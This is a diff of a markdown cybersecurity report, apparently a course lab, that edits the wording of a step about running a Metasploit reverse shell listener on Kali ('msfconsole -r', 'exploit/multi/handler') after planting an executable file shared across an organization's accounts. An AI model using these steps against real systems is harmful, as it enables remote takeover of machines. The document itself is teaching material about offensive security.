AM311/Cybersecurity_Report/home.md

 	Doing so, all the account of the organization will be able to see (and execute) that file.

  7. **Run the reverse shell server:**
-	For allowing us to take control of a machine, we need to start the reverse shell server on our Kali machine.
-	For doing so, we execute the following command:
+	For allowing us to take control of a machine, we now start the reverse shell server on Kali through the following command:

 	`msfconsole -r ./Desktop/meterpreter.rc`

-	where `msfconsole` is a CLI through which it is possible to interact with the Metasploit Framework and `meterpreter.rx` is a script, previously created, made up of the following commands:
+	where `msfconsole` is a CLI through which it is possible to interact with the Metasploit Framework and `meterpreter.rc` is a script, previously created, made up of the following commands:

 	```
 	use exploit/multi/handler